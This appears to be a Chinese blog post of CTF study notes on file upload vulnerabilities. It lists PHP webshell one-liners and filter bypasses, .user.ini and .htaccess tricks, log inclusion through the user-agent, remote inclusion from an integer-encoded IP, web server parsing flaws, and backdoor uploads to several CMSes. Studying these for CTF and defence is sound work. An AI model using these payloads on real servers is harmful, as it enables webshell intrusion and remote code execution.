文件上传漏洞详解

最新推荐文章于 2024-06-03 17:24:52 发布
最新推荐文章于 2024-06-03 17:24:52 发布
阅读量619 收藏 23
点赞数 15
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62773959/article/details/138992594
版权

文件上传

ctf赛题知识点

文件上传后门连接

#知识点:

1、文件上传-前端验证

2、文件上传-黑白名单

3、文件上传-user.ini妙用

4、文件上传-PHP语言特性

#详细点:

1、检测层面:前端(js),后端(服务器检测)等

2、检测内容:文件头,完整性,二次渲染等

3、检测后缀:黑名单,白名单,MIME检测等

4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等

可以修改网页源代码 直接上传php代码文件

用hackbar访问文件后 下面的postdata 输入x=system('tac ../flag');

后端代码 mime验证 抓包修改content-type image/png

多后缀解析php3 php5但不一定能访问

抓包修改文件名字.user.ini (需要开启某个开关) 文件内容为auto_prepend_file=1.png

然后上传图片中带有一句话木马的

会检测内容

过滤一句话木马中的<?php 换一种写法就行

<?echo '123';?> 前提是开启配置参数short_ <?=(表达式)?> 不需要开启参数设置

<% echo '123';%> 前提是开启配置参数asp_tags=

<script language="php">echo '1'; </script> 不需要修改参数开关

<?=eval($_POST[x]);?>

过滤一句话木马中[] 可以换成大括号{}

过滤一句话木马中;

  上传的1.png文件中直接写入<?=system('tac ../fl*') ?>

  然后.user.ini进行文件包含

过滤一句话木马中()

  反引号执行运算法

  <?=`tac ../fla*`?>

包含日志记录看保存了什么信息

例如nginx的日志文件中包含ua信息,然后就可以通过修改ua后 保存在日志中 进行连接

.user.ini: auto_prepend_file=test.png

test.png: <?=include"/var/lo"."g/nginx/access.lo"."g"?> (默认日志文件)

发现包含了ua信息,就可以通过修改数据报信息达到目的

文件头GIF89a判断文件类型

利用远程包含IP转换地址后门调用执行

.user.ini auto_prepend_file=png

png <?=include 'http://794750069'>

IP地址转换https://www.bejson.com/convert/ip2int/

过滤(){}等 同时文件被删除

直接利用.user.ini包含远程

auto_prepend_file=http://794750069/

auto_prepend_file=http://794750069/

条件竞争:在上传成功立马访问,创建新代码(代码被执行后新建一个文件)

png二次渲染

渲染方法https://blog.csdn.net/qq_40800734/article/details/105920149

渲染后上传图片码

get 0=system

post 1=tac flag.php

需要的条件是url 利用php用参数去引用图片文件

如果是访问文件地址的情景(绝对路径)就需要用到.user.ini

jpg文件二次渲染

判断上传前后的文件大小和内容

判断上传后的文件数据返回数据包 gb_jpeg  

1=system('ls ../');

Tac flag.php

.htaccess妙用

.htaccess默认不支持nginx,支持Apache,设置后支持nginx

.htaccess可以通过设置实现文件解析配置

AddType application/x-httpd-php .png

将.png后缀的文件解析成php

代码编译知识点

过滤system 就拆分 <?php $a='syste';$b='m';$c=$a.$b('tac ./flag.php');?>

.user.ini的利用条件

需要当前目录有指向 内容无所谓 需要引路人index.php

版本为7

中间件解析&编辑器安全

第一部分:中间件文件解析-IIS&Apache&Nginx

IIS 6 7 文件名 目录名

1、文件名:x.asp;.x.jpg

2、目录名:x.asp/x.jpg

3、IIS7.X与Nginx解析漏洞一致

这个主要是6版本和7版本

首先要想触发这个漏洞,第一个中间件是IIS,第二个上传的文件名或目录名能够修改。

比如它只让上传jpg格式的图片,那么我们把文件名改成1.asp;.1.jpg。他的格式还是jpg,但是写在图片里面的后门代码是可以正常执行的。或则目录名是可以带后缀的。比如本来叫1,我们给他改成1.asp那么我们上传到这个目录的jpg文件中的后门代码也是可以正常执行的。

然后就涉及到了这个命名的问题,它是下面三种不同的命名方式,基于本地名命名就挺好,直接就可以利用。如果是第二个和第三个看它能不能加上我们需要的,可以就表示有机会,没有就g

Apache

Apache和nginx的这四个案例都可以在vulhub中找到,建议看vulhub的,更加的清晰,直接搜名字即可,名字截图放在文章末尾

Apache 换行解析-vulhub (%0a截断,黑名单绕过)

利用条件:

1.是这个中间件

2.黑名单验证(在黑名单的后缀不让上传 php jsp等)

php%0a绕过黑名单

白名单可能不行(在白名单里面才可以上传 比如jpg png gif等)

1.jpg.php%0a(没考虑最后一个点为后缀,这个白名单就可以)

上传一个名为1.php的文件,被拦截:

在1.php后面插入一个\x0A(注意,不能是\x0D\x0A,只能是一个\x0A),不再拦截:

访问刚才上传的/1.php%0a,发现能够成功解析,但这个文件不是php后缀,说明目标存在解析漏洞:

下图是小迪的总结

Apache 解析漏洞(未知后缀解析漏洞)

利用条件

文件名需要基于本地上传为准

原理:

在低版本的apache中,若文件后缀x.php.xxx.yyy,在服务器中若此文件.yyy后缀不被解析,则依次向前解析,成功为止。

这个相当于是配置不当了,如果运维人员给后缀增加了处理器,那么就会造成这个漏洞

但想要利用这个漏洞首先中间件是apache,并且文件命名要以本地名上传为准,如果是以时间或则随机字符,那么你是无法控制的。

-Nginx 文件名逻辑 解析漏洞

1、文件名逻辑-CVE-2013-4547

影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

2、解析漏洞-nginx.conf配置不当

由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。

第二部分:#Web应用编辑器-Ueditor文件上传安全

这个主要是看编辑器有没有存在漏洞,跟源码和中间件无关,首先在前端页面的会员中心一般会有填写简历的地方,其他地方有上传到地方也可以,然后观察利用的是不是编辑器进行上传操作的,看是什么编辑器,然后看以前爆过的漏洞。

分析文件上传漏洞的步骤一般是先看中间件,然后去网上看爆过的历史漏洞能不能加以利用,接着看是否使用编辑器,也是看历史爆过的漏洞加以利用。最后看源码里面的漏洞。

补充:四个漏洞的截图,可直接去vulhub里面搜

实例cms文件上传安全分析

白盒审计三要素:

白盒:看三点,中间件,编辑器,功能代码

功能代码直接看源码应用或搜索关键字(第一个案例)

编辑器直接看目录机构或搜索关键字(第二个案例)

中间件直接看语言环境常见搭配(第三个案例)

黑盒审计四要素:

黑盒:寻找一切存在文件上传的功能应用

个人用户中心是否存在文件上传功能(第一个案例)

后台管理系统是否存在文件上传功能(第二个案例)

字典目录扫描探针文件上传构造地址(第三个案例)

字典目录扫描探针编辑器目录构造地址(第三个案例)

#白盒审计-Finecms-代码常规-处理逻辑

黑盒思路:寻找上传点抓包修改突破获取状态码及地址

审计流程:功能点-代码文件-代码块-抓包调试-验证测试

黑盒:首先把网站搭建好,源码在资源库。访问网站后就可以看到会员中心,这里可以上传图片,我们尝试上传后缀为.php的文件,发现不行。然后只能上传png图片进行抓包。

这里没有filename 或者是type等,可以看出只有tx一个变量。并且可以看到有base64加密。修改png为php后,并且把后面的数据修改成base64加密后的后门代码。可以通过访问文件,看到php是正常被上传上去的,但是路径还有文件名被修改了,导致黑盒测试的话,无法获取具体路径。

小迪讲的是因为是黑盒不知道上传后的具体路径,所以弄不了,但我在前端页面发现了上传图片后的地址,所以就可以访问后门文件获取信息。

审计流程:功能点-代码文件-代码块-抓包调试-验证测试

可以看出是mvc架构。

这个是文件上传功能是源码编写的,跟中间件和编辑器没啥关系,这是第一个案例。

#白盒审计-CuppaCms-中间件-.htaccess

黑盒思路:存在文件管理上传改名突破,访问后在突破

在上传文件进行反复测试(发现绕不过,白名单),那我们只能上传png图片了,然后在修改文件名那里发现问题,通过bp抓包,将文件修改成PHP文件,发现没办法直接执行,就算把后缀改成php了,也是不能直接执行的,这里我们猜测有可能是文件权限不足导致不能执行php文件,或则是中间件设置的问题(当执行php文件时,予以拒绝,如下图,这个。Htaccess配置文件时apache的),怀疑是有限制导致的,然后通过修改包加上../,移动到上一级目录,执行成功.

第二个思路就是把.htaccess配置文件直接删除。

审计流程:功能点-代码文件-代码块-抓包调试-验证测试

这个是中间件问题导致的漏洞。

白盒审计-Metinfo-编辑器引用-第三方安全

黑盒思路:探针目录利用编辑器漏洞验证测试

审计流程:目录结构-引用编辑器-编辑器安全查询-EXP利用验证

这个直接就是利用目录扫描工具扫到了编辑器,然后知道是哪个编辑器之后就上网上找了一个看这个编辑器版本的路径,访问后就得到了版本,然后就直接上网上找这个编辑器该版本的exp,然后利用进而渗透。这个是利用编辑器进行攻破的。

那么这个时候再看刚开始说的那个白盒审计三要素,黑盒审计四要素就一目了然了。

纪伯伦x
关注
  • 15
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安全、ctf文件上传漏洞
keep_reading的博客
10-07 765
文章目录文件上传漏洞客户端检测服务端检测服务端检测方式MIME类型检测文件内容检测目录路径检测文件内容检测恶意文件排查 php语言为主,ctf比塞题中上传成功后服务器会返回一个flag值,或者在混战模式中上传完木马文件get web shell? 文件上传漏洞 漏洞原因 如果用户可以上传图片,表格等,却没有对用户上传的文件类型有所限制,可能会被攻击者利用……比如上传了恶意文件(webshell)导致网站被控制或者瘫痪,甚至查看数据库,执行任意文件命令 webshell:网页木马/后门工具 例如:<?
uploadlabs靶场文件
02-27
这个靶场可以帮助安全研究人员、开发人员以及网络安全爱好者了解和掌握如何预防和修复文件上传漏洞。 【描述】:该靶场是基于PHPStudy的LAMP(Linux、Apache、MySQL、PHP)环境搭建的。"www"目录是Apache服务器默认...
CTF-PUT上传漏洞
不知名白帽的博客
05-27 765
CTF-PUT上传漏洞,实验环境:kali(192.168.20.128),靶机(192.168.20.137)。进行信息探测,漏洞扫描未发现有效信息后,测试PUT漏洞,发现存在PUT漏洞,下载插件Poster(RESTClient),然后上传大马反弹shell
CTF-Web】文件上传漏洞学习笔记ctfshow题目)
最新发布
jayq1的博客
06-03 2172
文件上传漏洞学习笔记ctfshow题目为依托
CTF文件上传漏洞
m0_62102520的博客
07-04 310
并上传。
CTF-Web(3)文件上传漏洞
大表哥的博客
10-26 4762
一种网页后门,以asp、php、jsp等网页文件形式存在的一种命令执行环境,而。
ctfhub之文件上传漏洞
weixin_46954909的博客
05-28 995
工具:1.冰蝎或者蚁剑等连接工具,2.一句话木马。
php判断文件上传图片格式的实例详解
12-19
在PHP中,处理文件上传时,验证用户上传的文件是否为指定类型的图片是十分重要的,因为这涉及到安全性问题。在给定的实例中,我们看到一个简单的PHP代码片段用于检查上传文件的扩展名是否在允许的图片类型列表中。...
php 上传文件类型判断函数(避免上传漏洞 )
10-29
### PHP 文件类型判断函数详解及安全实践 #### 一、背景与目的 在Web开发中,文件上传功能是非常常见的需求之一。...通过上述方法,可以在很大程度上提高文件上传的安全性,减少因文件上传漏洞带来的风险。
文件上传之upload-labs(一)
01-08
文件上传漏洞详解文件上传漏洞是网络安全领域中常见的安全问题,它允许攻击者通过上传恶意文件(如木马、病毒或恶意脚本)来绕过服务器的安全检查,并执行任意代码。这种漏洞的存在可能导致服务器被控制,数据...
3.18号日报,ctfhub中web,文件上传漏洞题目解法
03-18
### 文件上传漏洞详解 文件上传漏洞是Web应用安全领域中的一种常见漏洞,它允许攻击者上传恶意文件到服务器,进而执行恶意代码或获取敏感信息。本文将基于标题“3.18号日报,ctfhub中web,文件上传漏洞题目解法”...
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境,解压,运行exe既可以完成所有需要的环境部署,省去大量繁琐的操作。
PHP_file_upload_vlun:PHP文件上传漏洞
05-14
**PHP文件上传漏洞详解** PHP文件上传漏洞是Web应用程序安全领域的一个重要问题,它允许攻击者上传恶意文件到服务器,从而可能执行任意代码、获取敏感信息或破坏网站正常功能。在PHP开发中,如果不正确地处理文件...
iis上传漏洞利用工具
07-06
**IIS上传漏洞详解** IIS(Internet Information Services)是微软公司推出的Web服务器服务,用于托管网站、应用程序和服务。在IIS的历史版本中,存在一些安全漏洞,其中一种常见的漏洞类型被称为"IIS解析漏洞"。这...
IIS6.0上传漏洞伪静态规则
11-21
**IIS6.0上传漏洞详解** IIS(Internet Information Services)是微软公司推出的一款用于Windows操作系统的Web服务器,版本6.0是其中的一个经典版本。然而,它存在一些安全漏洞,其中一个著名的问题就是“上传漏洞...
php文件上传
10-28
### PHP文件上传详解 在PHP开发中,文件上传是一个常见的需求,尤其是在构建具有文件处理功能的网站或应用程序时。本文将深入探讨“php文件上传”的关键知识点,包括基本原理、实现方式以及示例代码分析。 #### ...
PHP-nginx-ctfShow文件上传漏洞
m0_63917373的博客
10-11 1903
文件上传-前端验证 文件上传-黑白名单 文件上传-user.ini妙用 文件上传-PHP语言特性
CTFHUB 文件上传漏洞
qq_75120258的博客
02-04 868
定义:文件上传漏洞是web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。一般是因为站点开放了文件上传功能,但却对上传的文件没有进行足够的限制。程序开发部署时,没有考虑到系统特性、过滤不严格。站点服务器存在解析漏洞,被黑客利用后导致可以上传任意文件。
WEB漏洞攻防 - 文件上传漏洞 - CTF比赛类应用场景 - [RoarCTF 2024]Simple Upload
m0_60635224的博客
03-30 880
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。最近我才对这些路线做了一下新的更新,知识体系更全面了。
文件上传漏洞详解:安全与对策
"File in the hole - 文件上传漏洞详解与安全防护" 本文档主要探讨的是“File in the hole”——一种文件上传漏洞,该漏洞通常发生在Web应用程序中,允许攻击者通过上传恶意文件来获取对服务器的非法访问权限,甚至...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值